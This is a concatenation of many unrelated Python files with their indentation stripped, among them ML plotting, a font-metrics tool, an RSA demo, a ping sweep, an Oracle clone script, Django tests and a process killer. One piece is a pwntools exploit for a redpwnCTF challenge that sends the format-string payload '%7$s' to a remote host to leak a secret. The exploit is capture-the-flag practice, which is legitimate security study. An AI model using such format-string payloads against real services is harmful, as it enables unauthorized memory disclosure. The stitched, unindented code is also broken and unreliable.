import numpy as np
def plot_feature_importances_dataset(model):
n_features = x.shape[1]
plt.barh(np.arange(n_features), model.feature_importances_, align='center')
plt.yticks(np.arange(n_features), [dataset.feature_names[x] for x in index])
plt.xlabel('Feature Importances')
plt.ylabel('Features')
plt.ylim(-1, n_features)
plot_feature_importances_dataset(model)
plt.show()
'''
# model.feature_importances_
[3.00427759e-02 1.53808812e-04 2.66646072e-03 1.13227503e-03
3.07877293e-02 3.79559378e-01 8.50877684e-03 9.79148714e-02
7.55640378e-04 1.18182875e-02 3.47822800e-02 5.52293760e-03
3.96354779e-01]
acc : 0.8941528927104803
'''
'''
# 25% 미만 인 feature 제거 후
[0.02836551 0.00293281 0.03479936 0.37954049 0.0088569 0.09786892
0.01213989 0.03356735 0.00570301 0.39622577]
acc : 0.8938502491234904
''' |
#MenuTitle: Metrics Key Manager
# -*- coding: utf-8 -*-
__doc__="""
Batch apply metrics keys to the current font.
"""
import vanilla
LeftKeys="""
=H: B D E F I K L N P R Thorn Germandbls M
=O: C G Q
=o: c d e q eth
=h: b k l thorn
=n: idotless m p r
=|n: u
"""
RightKeys="""
=|: A H I M N O T U V W X Y
=O: D
=U: J
=o: b p thorn
=n: h m
=|n: idotless u
"""
class MetricsKeyManager( object ):
def __init__( self ):
# Window 'self.w':
windowWidth = 350
windowHeight = 240
windowWidthResize = 1000 # user can resize width by this value
windowHeightResize = 1000 # user can resize height by this value
self.w = vanilla.FloatingWindow(
( windowWidth, windowHeight ), # default window size
"Metrics Key Manager", # window title
minSize = ( windowWidth, windowHeight-100 ), # minimum size (for resizing)
maxSize = ( windowWidth + windowWidthResize, windowHeight + windowHeightResize ), # maximum size (for resizing)
autosaveName = "com.mekkablue.MetricsKeyManager.mainwindow" # stores last window position and size
)
# UI elements:
linePos, inset, lineHeight, boxHeight = self.getMeasurements()
self.w.LeftMetricsKeysText = vanilla.TextBox( (inset, linePos+2, 70, 14), u"Left Keys:", sizeStyle='small', selectable=True )
self.w.LeftMetricsKeys = vanilla.EditText( (inset+70, linePos, -inset, boxHeight), "", callback=self.SavePreferences, sizeStyle='small' )
linePos += boxHeight + 10
self.w.RightMetricsKeysText = vanilla.TextBox( (inset, linePos+2, 70, 14), u"Right Keys:", sizeStyle='small', selectable=True )
self.w.RightMetricsKeys = vanilla.EditText( (inset+70, linePos, -inset, boxHeight), "", callback=self.SavePreferences, sizeStyle='small' )
for editField in (self.w.LeftMetricsKeys, self.w.RightMetricsKeys):
editField.getNSTextField().setToolTip_(u"Enter a metrics key like '=H', followed by a colon (:), followed by glyph names, spearated by space, comma, or any other separator that cannot be part of a glyph name. (Glyph names can contain A-Z, a-z, 0-9, period, underscore and hyphen.)")
# Run Button:
self.w.resetButton = vanilla.Button( (-180-inset, -20-inset, -inset-90, -inset), u"⟲ Reset", sizeStyle='regular', callback=self.SetDefaults )
self.w.runButton = vanilla.Button( (-80-inset, -20-inset, -inset, -inset), "Apply", sizeStyle='regular', callback=self.MetricsKeyManagerMain )
self.w.setDefaultButton( self.w.runButton )
# Load Settings:
if not self.LoadPreferences():
print "Note: 'Metrics Key Manager' could not load preferences. Will resort to defaults"
# Bind resizing method:
self.w.bind("resize", self.windowResize)
# Open window and focus on it:
self.w.open()
self.w.makeKey()
def getMeasurements(self, sender=None):
lineHeight = 22
currentWindowHeight = self.w.getPosSize()[3]
boxHeight = currentWindowHeight/2 - lineHeight*1.5
return 12, 15, lineHeight, boxHeight
def windowResize(self, sender=None):
linePos, inset, lineHeight, boxHeight = self.getMeasurements()
self.w.LeftMetricsKeysText.setPosSize( (inset, linePos+2, 70, 14) )
self.w.LeftMetricsKeys.setPosSize( (inset+70, linePos, -inset, boxHeight) )
linePos += boxHeight + 10
self.w.RightMetricsKeysText.setPosSize( (inset, linePos+2, 70, 14) )
self.w.RightMetricsKeys.setPosSize( (inset+70, linePos, -inset, boxHeight) )
def SavePreferences( self, sender ):
try:
Glyphs.defaults["com.mekkablue.MetricsKeyManager.LeftMetricsKeys"] = self.w.LeftMetricsKeys.get()
Glyphs.defaults["com.mekkablue.MetricsKeyManager.RightMetricsKeys"] = self.w.RightMetricsKeys.get()
except:
return False
return True
def LoadPreferences( self ):
try:
Glyphs.registerDefault("com.mekkablue.MetricsKeyManager.LeftMetricsKeys", LeftKeys)
Glyphs.registerDefault("com.mekkablue.MetricsKeyManager.RightMetricsKeys", RightKeys)
self.w.LeftMetricsKeys.set( Glyphs.defaults["com.mekkablue.MetricsKeyManager.LeftMetricsKeys"] )
self.w.RightMetricsKeys.set( Glyphs.defaults["com.mekkablue.MetricsKeyManager.RightMetricsKeys"] )
except:
return False
return True
def SetDefaults(self, sender=None):
self.w.RightMetricsKeys.set( RightKeys.strip() )
self.w.LeftMetricsKeys.set( LeftKeys.strip() )
# update settings to the latest user input:
if not self.SavePreferences( self ):
print "Note: 'Metrics Key Manager' could not write preferences."
def parseGlyphNames(self, glyphNameText):
possibleChars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789.-_"
glyphNames = []
currName = ""
for currChar in glyphNameText.strip()+" ":
if currChar in possibleChars:
currName += currChar
else:
if currName:
glyphNames.append(currName)
currName = ""
return tuple(glyphNames)
def parseKeyText(self, keyText):
parseDict = {}
keyText = keyText.strip()
for line in keyText.splitlines():
line = line.strip()
if line and ":" in line:
key, glyphNameText = line.split(":")[:2]
parseDict[key] = self.parseGlyphNames( glyphNameText )
return parseDict
def MetricsKeyManagerMain( self, sender ):
try:
# update settings to the latest user input:
if not self.SavePreferences( self ):
print "Note: 'Metrics Key Manager' could not write preferences."
thisFont = Glyphs.font # frontmost font
if not thisFont:
Message(title="Metrics Key Manager Error", message="No font open. Metrics keys can only be applied to the frontmost font.", OKButton=None)
else:
print "Metrics Key Manager Report for %s" % thisFont.familyName
print thisFont.filepath
print
# to be turned into selectable options:
# delete all existing keys, respect existing keys, overwrite existing keys
respectExistingKeys = False
deleteExistingKeys = False
includeNonexportingGlyphs = True
shouldOpenTabWithAffectedGlyphs = False
LeftKeysText = Glyphs.defaults["com.mekkablue.MetricsKeyManager.LeftMetricsKeys"]
leftDict = self.parseKeyText(LeftKeysText)
RightKeysText = Glyphs.defaults["com.mekkablue.MetricsKeyManager.RightMetricsKeys"]
rightDict = self.parseKeyText(RightKeysText)
affectedGlyphs = []
for key in leftDict.keys():
print u"⬅️ Setting Left Key: '%s'" % key
glyphNames = leftDict[key]
for glyphName in glyphNames:
glyph = thisFont.glyphs[glyphName]
if glyph:
glyph.leftMetricsKey = key
affectedGlyphs.append(glyphName)
else:
print u" ❌ Glyph '%s' not in font. Skipped." % glyphName
for key in rightDict.keys():
print u"➡️ Right Key: '%s'" % key
glyphNames = rightDict[key]
for glyphName in glyphNames:
glyph = thisFont.glyphs[glyphName]
if glyph:
glyph.rightMetricsKey = key
affectedGlyphs.append(glyphName)
else:
print u" ❌ Glyph '%s' not in font. Skipped." % glyphName
if affectedGlyphs and shouldOpenTabWithAffectedGlyphs:
affectedGlyphs = set(affectedGlyphs)
thisFont.newTab( "/"+"/".join(affectedGlyphs) )
except Exception, e:
# brings macro window to front and reports error:
Glyphs.showMacroWindow()
print "Metrics Key Manager Error: %s" % e
import traceback
print traceback.format_exc()
MetricsKeyManager() |
#调用低通api实现RSA
import rsa
import time
#计算下时间
start_time = time.time()
key = rsa.newkeys(1024) #数字代表 p * q 产生的存储空间 bit 大小, 也就是密文长度,数字越大,时间越长
privateKey = key[1]
publicKey = key[0]
#print(privateKey)
#print(publicKey)
end_time = time.time()
print("make a key:", end_time - start_time)
#产生公钥和私钥
message = 'hello'
message = message.encode()
cryptedMessage = rsa.encrypt(message, publicKey)
print("crypted:", cryptedMessage)
print("length of cryptedMessage:", len(cryptedMessage))
# 加密的过程
decrypetdMessage = rsa.decrypt(cryptedMessage, privateKey)
print("decrypet:", decrypetdMessage)
# 解密的过程
now_time = time.time()
print("crypt and decrypt:", now_time - end_time)
|
from game.items.item import Log
from game.skills import SkillTypes
class NormalLog(Log):
name = 'Normal Log'
value = 97
xp = {SkillTypes.firemaking: 40, SkillTypes.fletching: 1}
skill_requirement = {SkillTypes.firemaking: 1, SkillTypes.fletching: 1} |
#!/usr/bin/python
# --*-- coding:utf-8 --*--
from __future__ import print_function
import subprocess
import threading
#
def is_reacheable (ip):
#subprocess.call() 调用系统命令
#os.system()
if subprocess.call(["ping","-c","1",ip]):
print ("{0} is alive ".format(ip))
else:
print ("{0} is unreacheable ".format(ip))
def main ():
#for i in {1..255} ;do echo 10.1.1.${i} >> ips.txt ;done
#for i in $(seq 1 255) ;do echo 10.1.1.${i} >> ips.txt ;done
with open("ips.txt") as f :
lines =f.read()
lines =lines.splitlines() #去除换行
threads=[]
for line in lines: #第一个参数是线程函数变量,第二个参数args是一个数组变量参数,如果只传递一个值,就只需要i, 如果需要传递多个参数,那么还可以继续传递下去其他的参数,其中的逗号不能少,少了就不是数组了,就会出错。
thr=threading.Thread(target=is_reacheable, args=(line,))
thr.start()
threads.append(thr)
for thr in threads:
thr.join()
if __name__=="__main__":
main()
|
import os
import time
import tensorflow as tf
import joblib
import logging
from utils.all_utils import get_time_stamp
def create_and_save_checkpoint_callback(callbacks_dir,checkpoint_dir):
checkpoint_file_path = os.path.join(checkpoint_dir, "ckpt_model.h5")
checkpoint_callback = tf.keras.callbacks.ModelCheckpoint(
filepath=checkpoint_file_path,
save_best_only=True
)
ckpt_callback_filepath = os.path.join(callbacks_dir, "checkpoint_cb.cb")
joblib.dump(checkpoint_callback, ckpt_callback_filepath)
logging.info(f"tensorboard callback is being saved at {ckpt_callback_filepath}")
def create_and_save_tensorboard_callback(Callbacks_dir,tensorboard_log_dir):
unique_name=get_time_stamp("tb_logs")
tb_running_log_dir=os.path.join(tensorboard_log_dir,unique_name)
tb_callbacks=tf.keras.callbacks.TensorBoard(log_dir=tb_running_log_dir)
tb_callbacks_filepath=os.path.join(Callbacks_dir,"tb_cb.cb")
joblib.dump(tb_callbacks,tb_callbacks_filepath)
logging.info(f"tensorboard callback is being saved at {tb_callbacks_filepath}")
def get_callbacks(callback_dir_path):
callback_path = [
os.path.join(callback_dir_path, bin_file) for bin_file in os.listdir(callback_dir_path) if bin_file.endswith(".cb")
]
callbacks = [
joblib.load(path) for path in callback_path
]
logging.info(f"saved callbacks are loaded from {callback_dir_path}")
return callbacks
|
# %%
import os
# %%
DataFolder = os.path.join(os.environ['HOME'],
'RSVP_dataset',
'processed_data')
|
from selenium import webdriver
from BrowserFactory.AbstractFactory import AbstractFactory
# This class is obsolete
class FirefoxBrowser(AbstractFactory):
def __init__(self):
self.driver = webdriver.Firefox(executable_path="/usr/bin/geckodriver")
self.driver.implicitly_wait(10)
self.driver.maximize_window()
def open(self, url):
self.driver.get(url)
def close(self):
self.driver.quit();
|
import os
def split_by_n(fname,n=3):
'''
:param fname: input, file
:param n: input, int
:return: output, n files
'''
assert isinstance(fname,str)
assert isinstance(n,int)
assert 1<=n<=99
sum = os.path.getsize(fname)
ave = sum/n
with open(fname,'r') as f:
lines = f.readlines()
# lines = [line.rstrip('\n') for line in open(fname)]
# read file by lines, and put these lines into list
# nn=0
# for i in lines:
# nn+=len(i)
# print(nn)
list1=[0]
part=0
# the loop is to find line splitting the files
for i in range(len(lines)):
if part <= ave:
part=part+len(lines[i])
elif part>ave:
list1.append(i-1)
part=len(lines[i])+len(lines[i-1])
if len(list1) >= n:
break
list1.append(len(lines))
# print(list1)
# num = 0
# no meaning, only for showing the result when test
for (x, y) in zip(range(n), list1[1:]):
# print('x is', x)
# print('y is', y)
f = open(('{}{}{:0>2d}{}'.format(fname,'_', x ,'.txt')), 'wb')
# use 'wt' write module doesn't work well in the number of bytes, so have to use 'wb'
for i in (lines[list1[list1.index(y)-1]:y]):
f.write(i.encode('utf8'))
# use the 'wb' write module, so have to encode
f.close()
# with open(('{}{}{:0>2d}{}'.format(fname, '_', x, '.txt')), 'r') as g:
# content = g.readlines()
# print(content[-1])
# num+=os.path.getsize(('{}{}{:0>2d}{}'.format(fname, '_', x, '.txt')))
# print('num is', num)
return
|
import os
import subprocess
'''
Read events from allEvents.txt file.
Each line of the file has to be of the structure:
run:lumi:event
'''
eventList = []
with open("allEvents.txt","r") as f:
while True:
l = f.readline()
if l =='': break
eventList.append(l.replace('\n',''))
runsAndEras = {\
'2016B': {'range': (272007, 275376), 'dataset':'/SingleElectron/Run2016B-03Feb2017_ver2-v2/MINIAOD'},
'2016C': {'range': (275657, 276283), 'dataset':'/SingleElectron/Run2016C-03Feb2017-v1/MINIAOD'},
'2016D': {'range': (276315, 276811), 'dataset':'/SingleElectron/Run2016D-03Feb2017-v1/MINIAOD'},
'2016E': {'range': (276831, 277420), 'dataset':'/SingleElectron/Run2016E-03Feb2017-v1/MINIAOD'},
'2016F': {'range': (277772, 278808), 'dataset':'/SingleElectron/Run2016F-03Feb2017-v1/MINIAOD'},
'2016G': {'range': (278820, 280385), 'dataset':'/SingleElectron/Run2016G-03Feb2017-v1/MINIAOD'},
'2016Hv2': {'range': (280919, 284037), 'dataset':'/SingleElectron/Run2016H-03Feb2017_ver2-v1/MINIAOD'},
'2016Hv3': {'range': (284037, 284044), 'dataset':'/SingleElectron/Run2016H-03Feb2017_ver3-v1/MINIAOD'},
}
for i,ev in enumerate(sorted(eventList)):
run_str = ev.replace(':','_')
run = int(ev.split(':')[0])
dataset = False
for era in runsAndEras:
if run >= runsAndEras[era]['range'][0] and run <= runsAndEras[era]['range'][1]:
dataset = runsAndEras[era]['dataset']
if dataset:
print "Event %s should be in datset %s"%(ev, dataset)
else: print ":("
oFile = "picks/event_%s"%i
cmd = ["edmPickEvents.py", dataset, ev, "--output", oFile, "--runInteractive"]
print ' '.join(cmd)
subprocess.call(cmd)
|
#!/usr/bin/env python
"""Clone an Oracle DB Using python"""
### usage: ./cloneOracle.py -v mycluster \
# -u myuser \
# -d mydomain.net \
# -ss oracleprod.mydomain.net \
# -ts oracledev.mydomain.net \
# -sd proddb \
# -td devdb \
# -oh /home/oracle/app/oracle/product/11.2.0/dbhome_1 \
# -ob /home/oracle/app/oracle \
# -w
### import pyhesity wrapper module
from pyhesity import *
from time import sleep
### command line arguments
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('-v', '--vip', type=str, required=True) # Cohesity cluster name or IP
parser.add_argument('-u', '--username', type=str, required=True) # Cohesity Username
parser.add_argument('-d', '--domain', type=str, default='local') # Cohesity User Domain
parser.add_argument('-ss', '--sourceserver', type=str, required=True) # name of source oracle server
parser.add_argument('-sd', '--sourcedb', type=str, required=True) # name of source oracle DB
parser.add_argument('-ts', '--targetserver', type=str, default=None) # name of target oracle server
parser.add_argument('-td', '--targetdb', type=str, default=None) # name of target oracle DB
parser.add_argument('-oh', '--oraclehome', type=str, required=True) # oracle home path on target
parser.add_argument('-ob', '--oraclebase', type=str, required=True) # oracle base path on target
parser.add_argument('-lt', '--logtime', type=str, default=None) # oracle base path on target
parser.add_argument('-l', '--latest', action='store_true')
parser.add_argument('-w', '--wait', action='store_true') # wait for completion
args = parser.parse_args()
vip = args.vip
username = args.username
domain = args.domain
sourceserver = args.sourceserver
sourcedb = args.sourcedb
if args.targetserver is None:
targetserver = sourceserver
else:
targetserver = args.targetserver
if args.targetdb is None:
targetdb = sourcedb
else:
targetdb = args.targetdb
oraclehome = args.oraclehome
oraclebase = args.oraclebase
logtime = args.logtime
latest = args.latest
wait = args.wait
### authenticate
apiauth(vip, username, domain)
### search for view to clone
searchResults = api('get', '/searchvms?entityTypes=kOracle&vmName=%s' % sourcedb)
if len(searchResults) == 0:
print("SourceDB %s not found" % sourcedb)
exit()
### narrow search results to the correct server
searchResults = [searchResult for searchResult in searchResults['vms'] if sourceserver.lower() in [x.lower() for x in searchResult['vmDocument']['objectAliases']]]
if len(searchResults) == 0:
print("SourceDB %s on Server %s not found" % (sourcedb, sourceserver))
exit()
### find latest snapshot
latestdb = sorted(searchResults, key=lambda result: result['vmDocument']['versions'][0]['snapshotTimestampUsecs'], reverse=True)[0]
version = latestdb['vmDocument']['versions'][0]
ownerId = latestdb['vmDocument']['objectId']['entity']['oracleEntity']['ownerId']
### find target host
entities = api('get', '/appEntities?appEnvType=19')
for entity in entities:
if entity['appEntity']['entity']['displayName'].lower() == targetserver.lower():
targetEntity = entity
if targetEntity is None:
print "target server not found"
exit()
# handle log replay
versionNum = 0
validLogTime = False
if logtime is not None or latest is True:
if logtime is not None:
logusecs = dateToUsecs(logtime)
dbversions = latestdb['vmDocument']['versions']
for version in dbversions:
# find db date before log time
GetRestoreAppTimeRangesArg = {
"type": 19,
"restoreAppObjectVec": [
{
"appEntity": latestdb['vmDocument']['objectId']['entity'],
"restoreParams": {
"sqlRestoreParams": {
"captureTailLogs": True
},
"oracleRestoreParams": {
"alternateLocationParams": {
"oracleDBConfig": {
"controlFilePathVec": [],
"enableArchiveLogMode": True,
"redoLogConf": {
"groupMemberVec": [],
"memberPrefix": "redo",
"sizeMb": 20
},
"fraSizeMb": 2048
}
},
"captureTailLogs": False,
"secondaryDataFileDestinationVec": [
{}
]
}
}
}
],
"ownerObjectVec": [
{
"jobUid": latestdb['vmDocument']['objectId']['jobUid'],
"jobId": latestdb['vmDocument']['objectId']['jobId'],
"jobInstanceId": version['instanceId']['jobInstanceId'],
"startTimeUsecs": version['instanceId']['jobStartTimeUsecs'],
"entity": {
"id": ownerId
},
"attemptNum": 1
}
]
}
logTimeRange = api('post', '/restoreApp/timeRanges', GetRestoreAppTimeRangesArg)
if latest is True:
if 'timeRangeVec' not in logTimeRange['ownerObjectTimeRangeInfoVec'][0]:
logTime = None
latest = None
break
if 'timeRangeVec' in logTimeRange['ownerObjectTimeRangeInfoVec'][0]:
logStart = logTimeRange['ownerObjectTimeRangeInfoVec'][0]['timeRangeVec'][0]['startTimeUsecs']
logEnd = logTimeRange['ownerObjectTimeRangeInfoVec'][0]['timeRangeVec'][0]['endTimeUsecs']
if latest is True:
logusecs = logEnd - 1000000
validLogTime = True
break
if logStart <= logusecs and logusecs <= logEnd:
validLogTime = True
break
versionNum += 1
cloneParams = {
"name": "Clone-Oracle",
"action": "kCloneApp",
"restoreAppParams": {
"type": 19,
"ownerRestoreInfo": {
"ownerObject": {
"jobUid": latestdb['vmDocument']['objectId']['jobUid'],
"jobId": latestdb['vmDocument']['objectId']['jobId'],
"jobInstanceId": version['instanceId']['jobInstanceId'],
"startTimeUsecs": version['instanceId']['jobStartTimeUsecs'],
"entity": {
"id": latestdb['vmDocument']['objectId']['entity']['parentId'],
}
},
"ownerRestoreParams": {
"action": "kCloneVMs",
"powerStateConfig": {}
},
"performRestore": False
},
"restoreAppObjectVec": [
{
"appEntity": latestdb['vmDocument']['objectId']['entity'],
"restoreParams": {
"oracleRestoreParams": {
"alternateLocationParams": {
"newDatabaseName": targetdb,
"homeDir": oraclehome,
"baseDir": oraclebase
},
"captureTailLogs": False,
"secondaryDataFileDestinationVec": [
{}
]
},
"targetHost": targetEntity['appEntity']['entity'],
"targetHostParentSource": {
"id": targetEntity['appEntity']['entity']['id']
}
}
}
]
}
}
# apply log replay time
if validLogTime is True:
cloneParams['restoreAppParams']['restoreAppObjectVec'][0]['restoreParams']['oracleRestoreParams']['restoreTimeSecs'] = int(logusecs / 1000000)
else:
if logtime is not None:
print('LogTime of %s is out of range' % logtime)
print('Available range is %s to %s' % (usecsToDate(logStart), usecsToDate(logEnd)))
exit(1)
### execute the clone task
response = api('post', '/cloneApplication', cloneParams)
if 'errorCode' in response:
exit(1)
print("Cloning DB %s as %s..." % (sourcedb, targetdb))
taskId = response['restoreTask']['performRestoreTaskState']['base']['taskId']
status = api('get', '/restoretasks/%s' % taskId)
if wait is True:
finishedStates = ['kCanceled', 'kSuccess', 'kFailure']
while(status[0]['restoreTask']['performRestoreTaskState']['base']['publicStatus'] not in finishedStates):
sleep(1)
status = api('get', '/restoretasks/%s' % taskId)
if(status[0]['restoreTask']['performRestoreTaskState']['base']['publicStatus'] == 'kSuccess'):
print('Clone Completed Successfully')
exit(0)
else:
print('Clone ended with state: %s' % status[0]['restoreTask']['performRestoreTaskState']['base']['publicStatus'])
exit(1)
|
from 规则分词.mmcut import DicHelper
class RMMCut():
def __init__(self,window_size=1):
self.window_size=window_size
def cut(self,text,dic):
result=[]
delimiter='--'
index=len(text)
while index > 0:
for size in range(index-self.window_size,index):#从index-window_size增加到index-1位置
piece=text[size:index]#没找到就会按这个提取最后1个字切开
if piece in dic:
#找到,分词在字典里,index前移动到该分词所在开头位置
index=size+1#左闭右开
break
index-=1#①找到,从上次找到次开头的下一个开始;②未找到,切开这个字,从下一个开始
result.append(piece+delimiter)
result.reverse()
return result
if __name__=='__main__':
text = '研究生命的起源'
dic = ['研究', '研究生', '生命', '的', '起源']
helper = DicHelper(dic)
cutter=RMMCut(helper.longestInDic())
print(cutter.cut(text,dic)) |
from pwn import *
import sys
#import kmpwn
sys.path.append('/home/vagrant/kmpwn')
from kmpwn import *
#fsb(width, offset, data, padding, roop)
#config
context(os='linux', arch='i386')
context.log_level = 'debug'
FILE_NAME = "./secret-flag"
HOST = "2020.redpwnc.tf"
PORT = 31826
if len(sys.argv) > 1 and sys.argv[1] == 'r':
conn = remote(HOST, PORT)
else:
conn = process(FILE_NAME)
elf = ELF(FILE_NAME)
def exploit():
payload = "%7$s"
conn.sendlineafter("?\n", payload)
conn.interactive()
if __name__ == "__main__":
exploit()
|
import tensorflow as tf
import numpy as np
true_parameter = np.array([3, 10]).reshape(2, 1)
train_x = np.hstack((np.ones([100, 1]), np.random.rand(100, 1)))
train_y = np.dot(train_x, true_parameter) + np.random.randn(100, 1)
x = tf.placeholder(tf.float32, [100, 2])
theta = tf.Variable(tf.zeros([2, 1]))
hypothesis = tf.matmul(x, theta)
cost = tf.reduce_mean(tf.square(hypothesis - train_y))
train = tf.train.GradientDescentOptimizer(0.05).minimize(cost)
tf.scalar_summary('cost', cost)
tf.histogram_summary('theta', theta)
init_op = tf.initialize_all_variables()
summary = tf.merge_all_summaries()
with tf.Session() as sess:
writer = tf.train.SummaryWriter("./rg_logs", sess.graph_def)
sess.run(init_op)
for i in xrange(1000):
sess.run(train, feed_dict = { x: train_x })
if i % 100 == 0:
print(sess.run(theta).reshape(1, 2))
summary_result = sess.run(summary, feed_dict = { x: train_x })
writer.add_summary(summary_result, i)
|
from uuid import UUID
from onegov.fsi import FsiApp
from onegov.fsi.collections.attendee import CourseAttendeeCollection
from onegov.fsi.collections.audit import AuditCollection
from onegov.fsi.collections.course import CourseCollection
from onegov.fsi.collections.course_event import CourseEventCollection, \
PastCourseEventCollection
from onegov.fsi.collections.notification_template import \
CourseNotificationTemplateCollection
from onegov.fsi.collections.subscription import SubscriptionsCollection
from onegov.fsi.models.course import Course
from onegov.fsi.models.course_attendee import CourseAttendee
from onegov.fsi.models.course_event import CourseEvent
from onegov.fsi.models.course_notification_template import \
CourseNotificationTemplate
from onegov.fsi.models.course_subscription import CourseSubscription
@FsiApp.path(model=Course, path='/fsi/course/{id}')
def get_course_details(request, id):
return CourseCollection(request.session).by_id(id)
@FsiApp.path(model=CourseEvent, path='/fsi/event/{id}')
def get_course_event_details(request, id):
return CourseEventCollection(
request.session,
show_hidden=request.is_manager,
show_locked=True
).by_id(id)
@FsiApp.path(
model=PastCourseEventCollection,
path='/fsi/past-events',
converters=dict(course_id=UUID, show_hidden=bool, sort_desc=bool)
)
def get_past_events_view(
request,
page=0,
show_hidden=False,
course_id=None,
):
if not request.is_manager and show_hidden:
show_hidden = False
return PastCourseEventCollection(
request.session,
page=page,
show_hidden=show_hidden,
course_id=course_id,
show_locked=True
)
@FsiApp.path(
model=CourseEventCollection,
path='/fsi/events',
converters=dict(
upcoming_only=bool, past_only=bool, course_id=UUID, limit=int,
show_hidden=bool, sort_desc=bool
)
)
def get_events_view(
request,
page=0,
from_date=None,
upcoming_only=False,
past_only=False,
limit=None,
show_hidden=True,
course_id=None,
sort_desc=False
):
if not request.is_manager and show_hidden:
show_hidden = False
return CourseEventCollection(
request.session,
page=page,
from_date=from_date,
upcoming_only=upcoming_only,
past_only=past_only,
limit=limit,
show_hidden=show_hidden,
course_id=course_id,
sort_desc=sort_desc,
show_locked=True
)
@FsiApp.path(model=CourseCollection, path='/fsi/courses',
converters=dict(show_hidden_from_public=bool))
def get_courses(request, show_hidden_from_public):
if not request.is_admin:
show_hidden_from_public = False
return CourseCollection(
request.session,
auth_attendee=request.attendee,
show_hidden_from_public=show_hidden_from_public
)
@FsiApp.path(model=CourseAttendeeCollection, path='/fsi/attendees',
converters=dict(
exclude_external=bool,
external_only=bool,
editors_only=bool,
admins_ony=bool,
))
def get_attendees(
request, page=0, exclude_external=False, external_only=False,
editors_only=False, admins_only=False):
"""This collection has permission private, so no members can see it"""
return CourseAttendeeCollection(
request.session, page,
exclude_external=exclude_external,
external_only=external_only,
auth_attendee=request.attendee,
editors_only=editors_only,
admins_only=admins_only
)
@FsiApp.path(model=CourseAttendee, path='/fsi/attendee/{id}')
def get_attendee_details(request, id):
return CourseAttendeeCollection(request.session).by_id(id)
@FsiApp.path(model=CourseNotificationTemplateCollection, path='/fsi/templates',
converters=dict(course_event_id=UUID))
def get_notification_templates(request, course_event_id=None):
return CourseNotificationTemplateCollection(
request.session, course_event_id=course_event_id)
@FsiApp.path(model=CourseNotificationTemplate, path='/fsi/template/{id}')
def get_template_details(request, id):
return CourseNotificationTemplateCollection(request.session).by_id(id)
@FsiApp.path(model=SubscriptionsCollection, path='/fsi/reservations',
converters=dict(
attendee_id=UUID, course_event_id=UUID, external_only=bool)
)
def get_reservations(
app, request,
course_event_id=None, attendee_id=None, external_only=False, page=0):
if not attendee_id:
if not request.is_manager:
# check if someone has permission to see all subscriptions
attendee_id = request.attendee_id
# can be none....still, so not protected, use permissions
elif attendee_id != request.attendee_id and not request.is_manager:
attendee_id = request.attendee_id
return SubscriptionsCollection(
request.session,
attendee_id=attendee_id,
course_event_id=course_event_id,
external_only=external_only,
auth_attendee=request.attendee,
page=page
)
@FsiApp.path(model=CourseSubscription, path='/fsi/reservation/{id}')
def get_reservation_details(request, id):
return SubscriptionsCollection(request.session).by_id(id)
@FsiApp.path(model=AuditCollection, path='/fsi/audit',
converters=dict(
course_id=UUID, organisations=[str], page=int))
def get_audit(request, course_id, organisations, page=0, letter=None):
return AuditCollection(
request.session,
course_id,
auth_attendee=request.attendee,
organisations=organisations,
page=page,
letter=letter
)
|
import json
import unittest
from unittest import mock
from django.test import RequestFactory
from django.conf import settings
from api import views, middleware
settings.configure()
class TestStringMethods(unittest.TestCase):
def setUp(self):
self.factory = RequestFactory()
self.middleware = middleware.ViewExceptionMiddleware()
def process_request(self, request):
"""
helper method for making POST request to /avtale
as well as running exceptions through middleware
"""
try:
response = views.avtale(request)
response_json = json.loads(response.content.decode())
return response, response_json
except Exception as e:
response = self.middleware.process_exception(e)
try:
response_json = json.loads(response.content.decode())
return response, response_json
except:
return response, None
@mock.patch('api.services.fagsystem.opprett_kunde')
@mock.patch('api.services.fagsystem.opprett_avtale')
@mock.patch('api.services.fagsystem.oppdater_avtale')
@mock.patch('api.services.send_email')
def test_ok_response(self, send_email, oppdater_avtale, opprett_avtale, opprett_kunde):
# mock
request = self.factory.post(path='/avtale')
opprett_kunde.return_value = ('2222', 'mail@mail.com')
opprett_avtale.return_value = '3333'
oppdater_avtale.return_value = True
send_email.return_value = 'avtale sendt'
# make request
response, response_json = self.process_request(request)
# assert 200 OK
self.assertEquals(response.status_code, 200, 'OK')
# assert json body
self.assertAlmostEquals(response_json.get('avtalenummer'), '3333', 'avtale nummer er riktig')
self.assertAlmostEquals(response_json.get('status'), 'avtale sendt', 'status er riktig')
# assert mail was sendt
send_email.assert_called_with('mail@mail.com', '3333')
def test_503_if_service_unavailable(self):
# mock, but let fagsystem attempt request to nowhere
request = self.factory.post(path='/avtale')
# make request
response, response_json = self.process_request(request)
self.assertEquals(response.status_code, 503)
@mock.patch('api.services.fagsystem.opprett_kunde')
@mock.patch('api.services.fagsystem.opprett_avtale')
@mock.patch('api.services.fagsystem.put')
@mock.patch('api.services.send_email')
def test_could_not_update_avtale(self, send_email, http_put, opprett_avtale, opprett_kunde):
request = self.factory.post(path='/avtale')
opprett_kunde.return_value = ('2222', 'mail@mail.com')
opprett_avtale.return_value = '3333'
send_email.return_value = 'avtale sendt'
# Mock http PUT to return with HTTP STATUS 400, thereby failing
http_put.return_value = (True, 400)
# make request
response, response_json = self.process_request(request)
self.assertAlmostEqual(response_json.get('status'), 'Avtale sendt, men vi klarte ikke oppdatere databasen vår. Kontakt support')
if __name__ == '__main__':
unittest.main()
|
# -*- coding: UTF-8 -*-
# Date : 2020/2/17 15:53
# Editor : gmj
# Desc :
#
# import os
# import time
# ret = os.system('tasklist | find "QQ.exe"')
#
# print(ret)
import psutil
def get_count_of_nodejs():
i = 0
for pro in psutil.process_iter():
if pro.name() == 'node.exe':
i += 1
return i
def kill_process_with_name(process_name, num):
"""
根据进程名杀死进程
"""
if num < 0:
return
pid_list = psutil.pids()
i = 0
for pid in pid_list:
try:
each_pro = psutil.Process(pid)
if process_name.lower() in each_pro.name().lower():
each_pro.terminate()
i += 1
each_pro.wait(timeout=3)
if i >= num:
break
except psutil.NoSuchProcess:
pass
def kill_nodejs():
nodejs_num = get_count_of_nodejs()
kill_process_with_name('node.exe', nodejs_num - 5)
if __name__ == '__main__':
kill_nodejs()
|
# Tab length compensation a negative number will increase the gap between the tabs
# a fudge factor that increases the gap along the finger joint when negative - it should be 1/4 of the gap you want
fudge=0.1
thickness=3
#
box_width=60
box_height=15
box_depth = 25
cutter='laser'
tab_length=5
centre = V(0,0)
module = camcam.add_plane(Plane('plane',cutter=cutter))
